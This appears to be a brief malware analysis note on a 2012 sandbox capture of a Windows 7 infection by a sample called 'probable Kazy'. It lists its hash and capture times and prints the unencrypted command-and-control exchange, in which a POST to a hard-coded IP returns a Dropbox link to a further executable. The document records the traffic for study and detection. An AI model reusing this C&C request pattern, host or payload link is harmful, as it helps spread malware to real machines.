Analysis of probable Kazy

• 948549816.111111.exe. MD5: 8df6603d7cbc2fd5862b14377582d46a
• Infected a windows 7.
• Home Connection
• File size: 12 MB
• Capture duration: 8727 seconds (2.42 hs)
• Start time: Fri May 25 17:28:51 2012
• End time: Fri May 25 19:54:19 2012
• VirusTotal link
• Was called before captura-111111

Timeline

Fri May 25 12:59:56 ART 2012

The C&C is not encrypted. - Uses dropbox

POST /cmd.php HTTP/1.1
Connection: Keep-Alive
Content-Type: text/plain; Charset=UTF-8
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Content-Length: 0
Host: 46.105.227.94

HTTP/1.1 200 OK
X-Powered-By: PHP/5.3.3-7+squeeze9
Content-type: text/html
Transfer-Encoding: chunked
Date: Fri, 25 May 2012 16:01:10 GMT
Server: lighttpd/1.4.28

45
http://dl.dropbox.com/u/60244633/d6026fff2e326a77b1afd69a60afe42c.exe
0